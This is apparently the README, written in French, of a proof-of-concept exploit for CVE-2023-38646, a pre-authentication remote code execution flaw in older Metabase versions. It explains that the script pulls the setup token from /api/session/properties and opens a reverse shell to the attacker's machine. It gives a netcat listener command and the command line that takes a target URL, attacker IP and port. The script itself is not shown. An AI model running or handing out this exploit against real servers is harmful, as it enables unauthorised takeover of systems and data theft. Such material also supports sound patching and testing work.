
POC RCE pré-authentification Metabase
Metabase open source avant 0.46.6.1 et Metabase Enterprise avant 1.46.6.1 permettent aux attaquants d'exécuter des commandes arbitraires sur le serveur. J'ai écrit le script directement pour obtenir un reverse shell sur la machine de l'attaquant.
Le script nécessite l'URL cible, l'IP de l'attaquant et le port. Fournir le setup token n'est pas requis pour cette exploitation car le script tente de l'obtenir depuis /api/session/properties.
Assurez-vous de démarrer un écouteur netcat sur la machine de l'attaquant, en utilisant la commande suivante :
nc -nlvp {Port}
Exécutez le script POC avec :
python3 CVE-2023-38646.py -u <target-url> -ip <IP> -p <PORT>
